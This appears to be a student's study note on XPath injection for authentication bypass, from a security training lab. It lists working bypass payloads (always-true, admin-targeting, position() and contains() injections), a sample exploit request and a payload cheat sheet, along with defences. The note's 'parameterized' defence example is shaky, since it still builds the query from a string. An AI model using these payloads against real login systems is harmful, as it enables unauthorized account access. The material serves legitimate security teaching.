XPath Injection - Authentication Bypass
Key Concepts
What is XPath?
XPath is a query language for selecting nodes from an XML document.
It is often used in web applications for data retrieval and authentication mechanisms.
What is XPath Injection?
An attack technique where an attacker manipulates user input to alter the structure of an XPath query, bypassing authentication or gaining unauthorized access.
XPath Query Example
Consider the following XML user data:
xmlCopyEdit<users>
<user>
<username>htb-stdnt</username>
<password>Academy_student!</password>
</user>
<user>
<username>admin</username>
<password>admin</password>
</user>
</users>
Authentication might use the following query:
xpathCopyEdit/users/user[username/text()='USERNAME' and password/text()='PASSWORD']
If user input is unsanitized, injection becomes possible.
Common Payloads
Universal True (Bypass Authentication):
' or '1'='1
Resulting Query:
/users/user[username/text()='' or '1'='1' and password/text()='']
Target a Specific User (Admin):
admin' or '1'='1
Resulting Query:
/users/user[username/text()='admin' or '1'='1' and password/text()='irrelevant']
Use Position-Based Targeting:
' or position()=2 or '
Change the 2 to an 3 to Pivot to different account
' or position()=3 or '
Resulting Query:
/users/user[username/text()='' or position()=2 or '' and password/text()='irrelevant']
This targets the second user in the XML file (e.g.,
admin
).
Substring Matching:
' or contains(.,'admin') or '
Resulting Query:
/users/user[username/text()='' or contains(.,'admin') or '' and password/text()='irrelevant']
Searches for any user with "admin" in their username or other fields.
Steps to Exploit
Analyze Application Behavior:
Understand how usernames and passwords are processed (e.g., via POST requests, cookies, etc.).
Test for Injection Points:
Inject payloads into the username or password fields to observe server responses.
Craft Payloads:
Use payloads like
position()
orcontains()
to refine your query targeting.
Privilege Escalation:
Use payloads to access specific accounts or enumerate users until the desired privileges are obtained.
Practical Exploitation Example
Payload to Target Admin (Second User):
username=' or position()=2 or '&password=irrelevant
Response Example:
Successfully logged in as
WELCOME SUPERUSER!
.
Defense Measures
Sanitize Inputs:
Use proper input validation and encoding to prevent injection.
Reject special characters like
'
,"
,[
, and]
.
Parameterized Queries:
Avoid dynamically building XPath queries. Use parameterized XPath APIs:
$query = "/users/user[username/text()=$username and password/text()=$password]";
Hash Passwords:
Ensure passwords are hashed before storage and comparison.
Error Messages:
Avoid detailed error messages that reveal query structures.
Key Takeaways
XPath Injection is similar to SQL Injection but targets XML queries.
Functions like
position()
andcontains()
can help refine targeting in complex scenarios.Proper sanitization and secure coding practices are essential to mitigate these attacks.
Payloads to Remember
Scenario
Payload
Result
Bypass Authentication
' or '1'='1
Logs in as the first user.
Target Specific User (e.g., Admin)
admin' or '1'='1
Logs in as admin.
Position-Based User Targeting
' or position()=2 or '
Logs in as the second user.
Substring Matching (Admin)
' or contains(.,'admin') or '
Finds users with "admin" in username.
Last updated